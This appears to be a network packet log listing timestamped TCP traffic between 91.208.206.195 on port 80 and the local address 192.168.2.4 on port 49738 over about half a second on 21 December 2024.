                                                  Dec 21, 2024 00:13:16.987139940 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.987356901 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.987662077 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.987721920 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.987739086 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.987795115 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.987942934 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.988008976 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.988403082 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.988506079 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.988523006 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.988590956 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.988715887 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.988907099 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.989250898 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.989343882 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.989361048 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.989391088 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.989521027 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.989568949 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.990103006 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.990153074 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.990170002 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.990211010 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.990360022 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.990412951 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.990858078 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.990962029 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.990978956 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.991024971 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.991153955 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.991206884 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.991647005 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.991746902 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.991764069 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.991802931 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.991969109 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.992027998 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.992444038 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.992580891 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.992598057 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.992624998 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.992747068 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.992932081 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.993254900 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.993339062 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.993355989 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.993400097 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.993568897 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.993647099 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.994074106 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.994172096 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.994189024 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.994218111 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.994396925 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.994448900 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.994852066 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.994942904 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.994960070 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.995004892 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.995165110 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.995225906 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.995649099 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.995754004 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.995770931 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.995807886 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.995965004 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.996028900 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.996468067 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.996572018 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.996587992 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.996634960 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.996758938 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.996906996 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.997268915 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.997359991 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.997375965 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.997410059 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.997572899 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.997631073 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.998071909 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.998174906 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.998192072 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.998229027 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.998379946 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.998476982 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.998883009 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.998965025 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.998981953 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.999008894 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.999187946 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.999242067 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:16.999731064 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.999806881 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.999824047 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:16.999870062 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.000017881 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.000072956 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.000483036 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.000591040 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.000607967 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.000638962 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.000782967 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.000854969 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.172218084 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.172307014 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.172321081 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.172372103 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.172452927 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.172468901 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.172503948 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.172707081 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.172724009 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.172756910 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.173229933 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.173285007 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.173314095 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.173329115 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.173382998 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.173717976 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.173811913 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.173829079 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.173866987 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.174047947 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.174098015 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.174520016 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.174635887 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.174652100 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.174684048 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.174835920 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.174875021 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.175323963 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.175410032 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.175426006 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.175478935 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.175617933 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.175669909 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.176156044 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.176240921 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.176255941 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.176289082 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.176412106 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.176462889 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.177021980 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.177105904 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.177120924 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.177160025 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.177339077 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.177488089 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.177823067 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.177908897 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.177922010 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.177956104 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.178215981 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.178272009 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.178560972 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.178683996 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.178699017 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.178749084 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.178878069 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.178937912 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.179393053 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.179491997 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.179507971 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.179543972 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.179699898 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.179752111 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.180154085 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.180244923 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.180259943 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.180290937 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.180473089 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.180525064 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.180975914 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.181082010 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.181097984 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.181133986 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.181284904 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.181384087 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.181782007 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.181884050 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.181899071 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.181926966 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.182065010 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.182126999 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.182579994 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.182657003 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.182672977 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.182719946 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.182867050 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.182930946 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.183410883 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.183502913 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.183517933 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.183548927 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.183670044 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.183727980 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.184264898 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.184320927 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.184335947 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.184371948 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.184493065 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.184561014 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.184983015 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.185080051 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.185095072 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.185133934 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.185293913 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.185343981 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.185792923 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.185878992 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.185899973 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.185926914 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.186096907 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.186148882 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.186613083 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.186696053 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.186714888 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.186760902 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.186955929 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.187092066 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.187437057 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.187520027 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.187536001 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.187582016 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.187756062 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.187804937 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.188235998 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.188342094 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.188358068 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.188406944 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.188533068 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.188611984 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.189024925 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.189122915 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.189136982 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.189201117 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.189321995 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.189408064 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.189805984 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.189903975 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.189919949 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.189974070 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.190114975 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.190166950 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.190610886 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.190709114 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.190725088 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.190773010 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.190903902 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.190963984 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.191426039 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.191518068 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.191533089 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.191570044 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.191725969 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.191787004 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.192207098 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.192302942 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.192318916 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.192348003 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.192503929 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.192564964 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.193030119 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.193123102 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.193167925 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.364537001 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.364625931 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.364648104 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.364698887 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.364882946 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.364934921 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.365067959 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.365083933 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.365127087 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.365350008 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.365437031 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.365482092 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.365581989 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.365627050 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.365643024 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.365670919 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.366239071 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.366296053 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.366355896 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.366372108 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.366421938 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.366612911 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.367011070 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.367063046 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.367124081 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.367139101 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.367186069 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.367396116 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.367806911 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.367937088 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.367953062 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.367990971 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.368020058 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.368195057 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.368640900 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.368694067 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.368741035 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.368757010 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.368799925 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.369005919 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.369436979 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.369494915 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.369549990 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.369566917 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.369700909 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.369833946 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.370234013 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.370285034 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.370328903 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.370345116 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.370393038 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.370614052 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.371056080 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.371114969 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.371149063 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.371165037 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.371216059 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.371428967 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.371826887 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.371886015 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.371963978 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.371980906 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.372026920 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.372241974 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.372670889 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.372715950 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.372766972 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.372782946 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.372827053 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.373069048 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.373492002 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.373589993 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.373605013 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.373661995 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.373697996 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.373856068 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.374280930 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.374346018 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.374389887 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.374416113 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.374466896 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.374680042 CET804973891.208.206.195192.168.2.4
